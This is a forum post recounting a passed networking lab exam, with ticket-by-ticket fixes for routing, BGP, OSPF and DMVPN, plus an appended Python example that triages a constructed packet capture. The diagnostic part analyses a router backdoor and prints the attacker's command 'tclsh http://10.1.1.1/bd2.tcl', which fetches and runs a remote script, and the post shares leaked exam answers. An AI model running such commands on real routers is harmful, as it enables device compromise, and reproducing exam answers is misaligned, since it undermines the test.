orowp
10-27-2018, 11:12 AM
Passed the lab on 25-Oct. (TS1, H3Diag, H2+ Config)
Here is the feedback.
TS: TS1
=====
Ticket1: Incorrect ACL statement on SW2 for 176.16.200.0
permit 176.16.200.0
removed it and changed it to: permit 176.16.200.0 0.0.0.255
Ticket2: frame relay configured on R17. Changed it to ppp.
Ticket3: Incorrect router-id on R22. Changed it to lo0 ip of R22.
Ticket4: Passive interface on R12.
Ticket5: Didn't get 2 traces as expected
1. Network 134.21.21.21 not advertised on R21.
2. Added permit statement in prefix-list 194 on R21 for 194.1.1.1. Prefix-list was already applied in route-map with local-pref 99.
3. Trace to 134.21.21.21 and 123.3.3.3 worked as expected.
4. However trace to 8.8.8.8 and 194.1.1.1 didn't work as expected (load-balance) from R12 even when:
a. R12 received these routes from R4 and R6 and
b. ebgp neigh was up on R12 and maximum-paths 2 was pre-configured.
c. Multipaths were not getting installed.
Left this ticket as 10-15 minutes were gone in this debugging.
Ticket6: IPv6 neighborship (via IPv6 address) was activated in ipv4 address family on both routers.
Activated the Ipv6 neighbor in ipv6 address family on both routers
Ticket7:
a. Nhrp redirect missing on hub
b. ACL on R14 to block esp
c. nhrp shortcut command missing on R19.
Ticket8: Ticket required to set backup path via R8 if R7 fails. Following traces required:
a. Trace from PC104 to Server in AS of PC106
b. Trace from PC106 to 8.8.8.8
1. VLAN 200 network of SW connected to PC104 not advertised in ospf --> advertised this network and PC104 got ip address from dhcp server R9.
2. ip nat inside on R8 e0/0.123
3. ospf cost 1000 on e2/0 of R4 and R6.
4. vpnv4 neighborship between R4 and R6.
Tested backup path by shutting down e1/0.123 of R3
Ticket9:
ACL on R21 not causing DMVPN to come up.
Added permit any any command in ACL on R21 to solve the issue.
Ticket10:
1. Added ip add dhcp cli id e0/0 command in e0/0 of NAS.
2. added ip domain-lookup command on R21.
Returned back to ticket 5 after completing. Reloaded R12 but no success. Left the ticket. I took 2hr 15min to solve TS as I didn't want to take risk in TS. Solved the TS carefully and checked output of each ticket 2-3 times.
DONT FORGET TO SAVE THE CHANGES after output is received.
DIAG: H3
=======
Ticket 1: DHCP
1. Packet capture no: 114. (used bootp filter and selected first dhcp discovery packet)
2. What is reason ?
--> Selected this option: packet has dhcp options but relay ip is 0.0.0.0
3. Where is the packet captured?
--> Selected link between SW1-Sw3 (used cdp filter to confirm this in packet capture).
Ticket 2: TCL
First found out Router(victim) and Attacker IPs.
Filters used:
a. http.request.method==GET (source IP in GET request is Victim's IP)
b. tcp.port==1337 (Source IP in SYN packet is Victim's IP)
In my case: Victim: 10.1.1.2, Attacker: 10.1.1.1
Q1: Select 4 options:
Selected these options:
1. TCP connection from router to 10.1.1.1
2. TCP connection from remote host to router's IP 10.1.1.2 on port 1337.
3. Download of script in memory via HTTP
4. Installment of ransomware via backdoor.
Q2. Select command which can cause system meltdown:
In my case answer was "r" letter (not sudo poweroff)
Method to check the command:
1. In packet capture, use filter tcp.port==1337
2. select first SYN packet and select option 'follow stream' in analysis tab in top right corner in cloudshark (not using right click option like wireshark :P )
3. In the stream, select flow from 10.1.1.1 to 10.1.1.2 --> multiple commands were seen (c,r,q). Note these keywords.
4. Now again changed filter in capture to http.request.method==GET and followed the tcp stream like step 2.
5. In the GET response from 10.1.1.1 to 10.1.1.2, there was a script having above keywords with description (or banner message) next to each keyword)
6. In this script, r keyword had some description like this (don't remember exact description): Your router is compromised. Pay 100 bitcoins to get back your access or be ready for meltdown.
7. Hence selected "r" keyword/command for second question.
Q3. Command used by attacker to run script ?
--> tclsh http://10.1.1.1/bd2.tcl
Note: name of script is bd2.tcl which can be seen in GET request packet.
DIAG section can be hectic due to less time and a lot of attachments in each question. Don't blindly follow the dumps. Some dumps have wrong answers. Remember the flow for each diag question and select the best logical answer.
(I took around 25 min to answer 2 questions and rechecked both questions again in last 5 min)
Diag is very important because we need to get at least 4 out of 6 questions correct in order to score minimum passing score of 60%.
It would be very bad if we cleared TS and CFG and failed in DIAG :P
CFG: H2+
=======
Section1:
1.1: same as WB
1.2: same as WB
1.3: same as WB (PAgP required)
1.4: same as WB
After completing Sec 1, check that int vlan 911 ip of one SW is reachable from other switches (to save time I used following command on all Sw3-6: ping 255.255.255.255 rep 2)
Sec 2.1: OSPF required in DC 65002 with:
a. Type2-LSA not required.
b. vlan 100,101,911 passive on SW3 and Sw4
OSPF was configured in AS65002.
Note: vrf "Corp" present on R17 with int e0/1,lo0 and tu0 added in vrf, so configured "router ospf 1 vrf Corp" on R17.
Note: AS 65001 (core) has ospf preconfigured. Office and headquarters also had ospf configured:
1. Router IDs were missing on some devices.
2. ip ospf prio was 0 on R13 e0/1. changed it to 1.
3. Ospf not configured on R9,R10 (required to do in Sec 2.7), did it in 2.1 itself.
Sec 2.2: same as WB. Did sec 3.1 before 2.2
Sec 2.3: same as WB, but required output was not mentioned. Without giving metric rib-scale command, Lo52 was not seen on other routers. Hence gave metric rib-scale 153 on all JACOBS routers and R9-R10 (Configured eigrp on R9-R10 in 2.3 itself)
Sec 2.4:
1. Same as WB
2. Required allowas-in.
3. bgp preconfigured on CE routers but some commands were missing:
a. router-id
b. next-hop-self on 1 router
c. Lo0 of R14 advertised on R13. Removed it and advertised lo0 of R13.
(This section takes more time as we need to check preconfiguration on many devices and add missing commands)
There is a question that R11,12,13,14 send ONLY required networks: I used prefix list to permit the required 4 networks and applied it to ebgp neighborship. I felt this was logically the better choice (No WB has this solution)
Redistribution on R15, R16: It is mentioned R15,16 should send ospf default route to their ebgp.
So I used def info-originate instead of 'neigh x.x.x. def ori' as this command artificially generates default route even if default route is not present in RIB.
My solution was like this:
R15,16:
conf t
router ospf 1
redis bgp 65002 subnets metric-type 1 metric 1000 (used higher metric to satisfy condition of backdoor via R18-R57 in sec 2.8) (don't forget subnets keyword)
router bgp 65002
redis ospf 1 match int ext 2
default-info originate
Sec 2.5:
Question not very clear. So I followed like WB and referred Sec 3.3 for bgp requirements in Jacobs Core. Question 3.3 had:
a. PE in JACOBS should not contain AS65006
b. CE in JACOBS should not contain AS65001
Did conf like WB: removed 65006,added 65001, used no-prepend replace-as
Sec 2.6: same as WB:
R18:
router ospf 1
redistribute bgp 65002 subnets metric-type 1.
Note: R57 had redistribute eigrp command in bgp. Removed it to satisfy 2.6 requirement.
Sec 2.7: Required not to use route-map, access-list, prefix-list for redistribution.
used 'distance external' command in ospf of R9,10
Don't forget to use subnets keyword while redistributing ospf into bgp (OR networks will be distributed classful which will not cause Jacobs to reach Jamesons core networks)
Sec 2.8: Same as WB
Sec 2.9: Same as WB. Required vlan 100 to be configured passive.
Sec 2.10: Same as WB. R4 as active and R3 as standby.
Sec 2.11: Same as WB. Spokes should not become DR.
There was a point something like shortest mode on spoke --> configured ip pim vrf Corp spt-threshold infinity on all spokes.
Sec 3.1: same as WB
Sec 3.2: same as WB
mpls ip already configured on all interfaces. I enabled mpls and set router-id to lo0 on all routers.
Sec 3.3: same as WB. load-sharing on Jacobs PE
Sec 3.4:
a. Each Jamesons site should receive each others routes.
b. Each Jacobs site should receive each others routes.
c. Jamesons site should reach other Jamesons without going via DC.
d. Jacobs site should reach other Jacobs without going via DC.
e. Jamesons and Jacobs sites should communicate via DC.
--> Imported DC in all Jamesons and Jacobs
--> Imported Jamesons in each other. (not in Jacobs)
--> Imported Jacobs in each other. (not in Jamesons)
Sec 4.1: not to use deny.
Sec 4.2: same as WB.
Sec 5.1: same as WB
Sec 5.2: same as WB
Sec 5.3: Same as WB. Sw4 active. Sw3 standby
Sec 5.4: Same as WB.
I took around 5 hours to complete config section, configuring each section steadily and checking all required outputs after completing each section.
Don't hurry in config section as it becomes difficult and time-consuming to debug in case of some fault. Remember you are not in a RACE to complete config quickly. Use notepad to copy-paste repeating configs (check IPs while copy-pasting :P)
All the best for your LAB exams.
Go, get your NUMBER :cool:
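Added example, not from the original post or the exam material: a small Python triage that reproduces the capture-analysis steps from the TCL ticket (find the GET that fetched the script, follow the TCP/1337 stream, list the commands sent to the router) over a constructed packet list instead of a real pcap. All IPs, ports, packet numbers and payloads below are constructed; the direction of the TCP/1337 connection (remote host to router) follows the selected option 2 above.

```python
# Added example, not from the original post: mirrors the analyst's steps for
# the TCL ticket (GET filter, follow stream on TCP/1337, note the commands).
# The packet records below are constructed; there is no real pcap behind them.
from collections import namedtuple

Packet = namedtuple("Packet", "no src dst sport dport flags payload")

# Constructed capture: router 10.1.1.2 fetches /bd2.tcl from 10.1.1.1 over HTTP,
# then 10.1.1.1 connects to the router on TCP/1337 and sends one-letter commands.
CAPTURE = [
    Packet(1, "10.1.1.2", "10.1.1.1", 40001, 80, "S", b""),
    Packet(2, "10.1.1.1", "10.1.1.2", 80, 40001, "SA", b""),
    Packet(3, "10.1.1.2", "10.1.1.1", 40001, 80, "PA",
           b"GET /bd2.tcl HTTP/1.1\r\nHost: 10.1.1.1\r\n\r\n"),
    Packet(4, "10.1.1.1", "10.1.1.2", 80, 40001, "PA",
           b"HTTP/1.1 200 OK\r\n\r\n# script body omitted\r\n"),
    Packet(5, "10.1.1.1", "10.1.1.2", 50001, 1337, "S", b""),
    Packet(6, "10.1.1.2", "10.1.1.1", 1337, 50001, "SA", b""),
    Packet(7, "10.1.1.1", "10.1.1.2", 50001, 1337, "PA", b"c\r\n"),
    Packet(8, "10.1.1.1", "10.1.1.2", 50001, 1337, "PA", b"r\r\n"),
    Packet(9, "10.1.1.1", "10.1.1.2", 50001, 1337, "PA", b"q\r\n"),
]


def http_get_requests(capture):
    """Equivalent of the display filter http.request.method==GET."""
    return [p for p in capture if p.payload.startswith(b"GET ")]


def follow_stream(capture, port):
    """tcp.port==<port> plus 'follow stream': one byte string per direction."""
    streams = {}
    for p in capture:
        if port in (p.sport, p.dport) and p.payload:
            streams[(p.src, p.dst)] = streams.get((p.src, p.dst), b"") + p.payload
    return streams


def triage(capture, backdoor_port=1337):
    """Victim, attacker, fetched script URL and commands sent over the backdoor."""
    get = http_get_requests(capture)[0]           # first GET: victim is its source
    path = get.payload.split(b" ")[1].decode()    # /bd2.tcl, as seen in the GET
    host = get.payload.split(b"Host: ")[1].split(b"\r\n")[0].decode()
    victim, attacker = get.src, get.dst
    inbound = follow_stream(capture, backdoor_port).get((attacker, victim), b"")
    commands = [line.decode() for line in inbound.split(b"\r\n") if line]
    return {
        "victim": victim,
        "attacker": attacker,
        "script_url": "http://" + host + path,
        "commands": commands,                     # what was sent to the router
    }
```

On the constructed capture `triage(CAPTURE)` reports victim 10.1.1.2, attacker 10.1.1.1, script URL http://10.1.1.1/bd2.tcl and the command list c, r, q, which is the evidence the three questions ask for.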